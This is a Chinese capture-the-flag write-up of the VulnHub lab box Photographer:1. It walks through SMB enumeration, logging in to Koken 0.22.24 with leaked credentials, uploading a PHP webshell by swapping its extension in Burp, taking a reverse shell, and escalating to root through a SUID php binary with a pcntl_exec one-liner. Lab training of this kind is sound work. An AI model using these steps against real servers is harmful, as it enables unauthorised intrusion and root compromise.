OSCP难度靶机之Photographer:1

admin 2023年1月21日03:08:17评论48 views字数 1030阅读3分26秒阅读模式
虚拟机下载地址:https://www.vulnhub.com/entry/photographer-1,519/
虚拟机简介:这台机器是为准备 OSCP 而开发的
目标:2个flag,包含user.txt和root.txt
级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之Photographer:1

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.143

查看开放80、139、445、8000端口

OSCP难度靶机之Photographer:1

2、渗透测试

2.1 服务渗透

1.测试连接SMB

使用smbclient进行连接测试,发现有一个目录

smbclient -N -L \\192.168.207.143

OSCP难度靶机之Photographer:1

smbclient  //192.168.207.143/sambashare
get mailsent.txt
get wordpress.bkp.zip

OSCP难度靶机之Photographer:1

查看下载的TXT文件获取到账号和密码信息

账号:
[email protected](agi)
[email protected](daisa)
密码:
babygirl

OSCP难度靶机之Photographer:1

2.查看80端口服务

未发现有用信息

OSCP难度靶机之Photographer:1

3.查看8000端口服务

查看8000端口服务为Koken搭建

OSCP难度靶机之Photographer:1

查看网站源代码显示版本为Koken 0.22.24

OSCP难度靶机之Photographer:1

查找相关漏洞,发现有一个认证成功后的文件上传漏洞

searchsploit Koken 0.22.24

OSCP难度靶机之Photographer:1

4.文件上传

通过账号[email protected]和密码babygirl登录成功

OSCP难度靶机之Photographer:1

选择import content,先把webshell木马添加jpg后缀,并点击上传。

OSCP难度靶机之Photographer:1

使用BurpSuite进行拦截修改,选择删除后缀.jpg变成php后缀

OSCP难度靶机之Photographer:1

OSCP难度靶机之Photographer:1

文件已经成功上传完成,鼠标放到该位置会提示webshell的URL路径

OSCP难度靶机之Photographer:1

开启NC监听,并访问URL路径后获取到反弹shell连接

OSCP难度靶机之Photographer:1

2.2 主机渗透

1.获取user下的FLAG

cat /home/daisa/user.txt

OSCP难度靶机之Photographer:1

2.查找SUID文件

find / -perm -u=s -type f 2>/dev/null

OSCP难度靶机之Photographer:1

3.通过PHP进行提权

python -c "import pty;pty.spawn('/bin/bash')"
/usr/bin/php7.2 -r "pcntl_exec('/bin/bash', ['-p']);"

OSCP难度靶机之Photographer:1

4.获取FLAG

cat /root/proof.txt

OSCP难度靶机之Photographer:1

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Photographer:1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月21日03:08:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之Photographer:1https://cn-sec.com/archives/1407979.html

发表评论

匿名网友 填写信息